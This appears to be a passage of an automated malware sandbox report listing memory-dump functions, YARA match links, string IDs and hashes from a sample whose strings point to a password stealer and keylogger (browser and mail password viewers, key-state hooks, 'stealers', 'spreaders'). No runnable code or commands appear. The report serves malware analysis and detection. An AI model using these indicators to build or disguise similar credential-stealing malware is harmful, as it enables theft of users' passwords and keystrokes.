                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: etObject$mailpv$moryExecute$owserPassView$tingsBase
                                                                      • API String ID: 0-1272195059
                                                                      • Opcode ID: b5899a84603862643cb4345b4e1765688ff685a58259b3b6cd5021ea063ea501
                                                                      • Instruction ID: 7724743c2fe2926b7e31df9e9108f4612950ae222f836f82c0312cf70caa52ee
                                                                      • Opcode Fuzzy Hash: b5899a84603862643cb4345b4e1765688ff685a58259b3b6cd5021ea063ea501
                                                                      • Instruction Fuzzy Hash: 0771BF70900214AFDF15DF55C881AAEBBB4EF48320F1540AAE8157B392C779AE50CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004165E9, Relevance: 6.4, Strings: 5, Instructions: 171COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: etObject$mailpv$moryExecute$owserPassView$tingsBase
                                                                      • API String ID: 0-1272195059
                                                                      • Opcode ID: 2da5678ef2efda63e6d04daa6b72e154f486a5efa12a1df60f83ed46eeb138ac
                                                                      • Instruction ID: 23775b57c5181a705fd841c27966cf022b6c2ad29db91b8595daa32edbf3a325
                                                                      • Opcode Fuzzy Hash: 2da5678ef2efda63e6d04daa6b72e154f486a5efa12a1df60f83ed46eeb138ac
                                                                      • Instruction Fuzzy Hash: F561BF31A00215AFDB15DF69C840BAEBBB5FF44314F16819AE855AB391CB38EE40CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003EA303, Relevance: 6.4, Strings: 5, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: W?>$WM_KEYUP$YSKEYDOWN$rdHandle$tCheckedForegroundTitle
                                                                      • API String ID: 0-1626258673
                                                                      • Opcode ID: d8f5ebd983a17c3e389eb9b24939bfa1e49e9601f81a54babbe5a8f5dbc87592
                                                                      • Instruction ID: 82ad83976ee985ed02c23c17c2e617a6a848d2e4f05bc5c05883554c31e76abd
                                                                      • Opcode Fuzzy Hash: d8f5ebd983a17c3e389eb9b24939bfa1e49e9601f81a54babbe5a8f5dbc87592
                                                                      • Instruction Fuzzy Hash: 883133B6401715BEDB20A6668C86EFF737CEF80714F10419FF114A22C2D7796D819716
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040F4D5, Relevance: 5.4, Strings: 4, Instructions: 397COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: blecmd$blespreaders$lers$onfig
                                                                      • API String ID: 0-481515171
                                                                      • Opcode ID: 0081d5c7f54b3d98f68d98c44ef9de1f41ae34dfb7a9c3a776c16707995f7a76
                                                                      • Instruction ID: 6402ad81fb6b09abb2f1c861852fb12422070b99dcffa0eb0a2dbc2aadf66f39
                                                                      • Opcode Fuzzy Hash: 0081d5c7f54b3d98f68d98c44ef9de1f41ae34dfb7a9c3a776c16707995f7a76
                                                                      • Instruction Fuzzy Hash: 6FF15C719083419FD724DF15C480A1BB7E1BF98314F14893EF985AB7A2D778E849CB8A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003FC12B, Relevance: 5.3, Strings: 4, Instructions: 266COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ($eplace$nput$ssCollection
                                                                      • API String ID: 0-3968101734
                                                                      • Opcode ID: d755f27a03abb9c19fb199d35ae9f5dbe1cc2d2f2486be66b19254a0a7a9c303
                                                                      • Instruction ID: fcb97479f6c5ee1e9a2d3fd182630dc95d510c4f748e9e3d89775aed82ad15a9
                                                                      • Opcode Fuzzy Hash: d755f27a03abb9c19fb199d35ae9f5dbe1cc2d2f2486be66b19254a0a7a9c303
                                                                      • Instruction Fuzzy Hash: 18B13571E00268CFDB25DF69C880BADB7B1AF48310F1585EAE50DAB251D734AE85CF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004108EF, Relevance: 5.2, Strings: 4, Instructions: 225COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [ralt] $"$]----$cretKey
                                                                      • API String ID: 0-821508316
                                                                      • Opcode ID: 7239851b87b73b2b576e4bdc9ed1d759d6a3dc0bf60bd135c0ac29f64485b5cd
                                                                      • Instruction ID: 79fceb5a15ab96600d75acf66726443de40a04c91b4a8acb970fd3e9e3ca5a36
                                                                      • Opcode Fuzzy Hash: 7239851b87b73b2b576e4bdc9ed1d759d6a3dc0bf60bd135c0ac29f64485b5cd
                                                                      • Instruction Fuzzy Hash: D4817C709042499FDF10DF95C9819EEBBB1EF08318F20816AE944AB382D778EDC1CB59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003FB402, Relevance: 5.2, Strings: 4, Instructions: 175COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: alogResult$eplace$nput$ssCollection
                                                                      • API String ID: 0-1282157775
                                                                      • Opcode ID: fcdbbed227913cea6e670874191b59cf7525f3a5d5ea891bbf393e993d717771
                                                                      • Instruction ID: 65ceef295a2406448e14adf3304f50eaada4ed9c5c614e733cbf015694502e13
                                                                      • Opcode Fuzzy Hash: fcdbbed227913cea6e670874191b59cf7525f3a5d5ea891bbf393e993d717771
                                                                      • Instruction Fuzzy Hash: FA814A72D00269DFDF26DF54C881BA9BBB0AF04314F1580DAE908BB252D774AA84CF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040E885, Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: E@$E@$alogResult$stealers
                                                                      • API String ID: 0-676929206
                                                                      • Opcode ID: 716a136052da102a409e342fd1c3c6b937cf1be9b708008c5029184d985e8f10
                                                                      • Instruction ID: a3db400f85aeb70d3d7dceeecf2484641178af7c7eb0baca3baf059bb90a8548
                                                                      • Opcode Fuzzy Hash: 716a136052da102a409e342fd1c3c6b937cf1be9b708008c5029184d985e8f10
                                                                      • Instruction Fuzzy Hash: 5251B171A00245EFCB15CF6AC880AAEB7B5AF85310F20446BE411EB3D2E738E912CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003FD9A6, Relevance: 5.1, Strings: 4, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: alogResult$eplace$nput$ssCollection
                                                                      • API String ID: 0-1282157775
                                                                      • Opcode ID: 48af60b81afe077e89717de1585323a7bb45d78e9ade54197e1b75c028f723db
                                                                      • Instruction ID: 832c5015c8b46af1365979640141732d0ecaf7cb3f0835352f5ace0868dddf7b
                                                                      • Opcode Fuzzy Hash: 48af60b81afe077e89717de1585323a7bb45d78e9ade54197e1b75c028f723db
                                                                      • Instruction Fuzzy Hash: 84517075900218EFDB22DF98C881BACBBB1EF44310F258496EA09BB251D775EE85CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003EA431, Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: back$groundTitle$onment$tem.IO
                                                                      • API String ID: 0-3494574869
                                                                      • Opcode ID: 9a5e19d82dd8fecb769b2109d35e635458a9c8e25781593e7062ead4ef09843a
                                                                      • Instruction ID: 68362988bef36b44b354e8d21e58007a30a11c1ded230cd605da3781e219b713
                                                                      • Opcode Fuzzy Hash: 9a5e19d82dd8fecb769b2109d35e635458a9c8e25781593e7062ead4ef09843a
                                                                      • Instruction Fuzzy Hash: B941A4B194125DAAEB20EB55CC45FFB737CFF45300F0401EAB909A2291E7359B948F66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00407627, Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: bute$can only be set to Nothing$tart$yAttribute
                                                                      • API String ID: 0-3363723335
                                                                      • Opcode ID: 7922f3ac3d11ac309c69a3cccb0bcf600ae82b13959e5ac31e31877597629905
                                                                      • Instruction ID: 3e7e7deb81854117757ce4072510090786ed4db560648b3831a3de1b255960e7
                                                                      • Opcode Fuzzy Hash: 7922f3ac3d11ac309c69a3cccb0bcf600ae82b13959e5ac31e31877597629905
                                                                      • Instruction Fuzzy Hash: 15319031A04214BFDF11AFA58C42A6E7BA5DF44364B1400BAFC04B7392E779BD509B9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003EA209, Relevance: 5.1, Strings: 4, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ableSSL$ocker$rror$websitevisitor
                                                                      • API String ID: 0-2711359268
                                                                      • Opcode ID: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
                                                                      • Instruction ID: fdcc71baa2c1898a34b417db1a72cc4b5b6a58a4956308bdae5f86da85e711d6
                                                                      • Opcode Fuzzy Hash: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
                                                                      • Instruction Fuzzy Hash: A901D655E94AF1A1FA3320074C42FB616589BA3B14FB54B27BB45305C0A19F2D86539F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405444, Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: broswers$hain$sion$ssage
                                                                      • API String ID: 0-533874572
                                                                      • Opcode ID: 1a9e1ef1dc770ded04876e966bdc7d5da9b0f7fca2beb3cbcad6bbb8c78e8139
                                                                      • Instruction ID: 96d0ecbdaac24cd4865d4fd82dce6607e3fdf6c36f9fb55bf83c8aadf7e7fd8b
                                                                      • Opcode Fuzzy Hash: 1a9e1ef1dc770ded04876e966bdc7d5da9b0f7fca2beb3cbcad6bbb8c78e8139
                                                                      • Instruction Fuzzy Hash: BAF0F431604708BFFB211D659C01BA7B6A8EB40365F104537FC04E6281E779C8648AA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003E90E7, Relevance: 5.0, Strings: 4, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: GetTypeFromHandle$ainsKey$idOperationException$ntimeTypeHandle
                                                                      • API String ID: 0-1766265863
                                                                      • Opcode ID: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
                                                                      • Instruction ID: 44706222da7b7531220037572efdf130db1f87326ad9f4a125fafc4dbee6b1e5
                                                                      • Opcode Fuzzy Hash: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
                                                                      • Instruction Fuzzy Hash: 69F03478984704AEDB30AF75DC08E07BEF0EFA8B11721892EE0C593650D779A401EF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%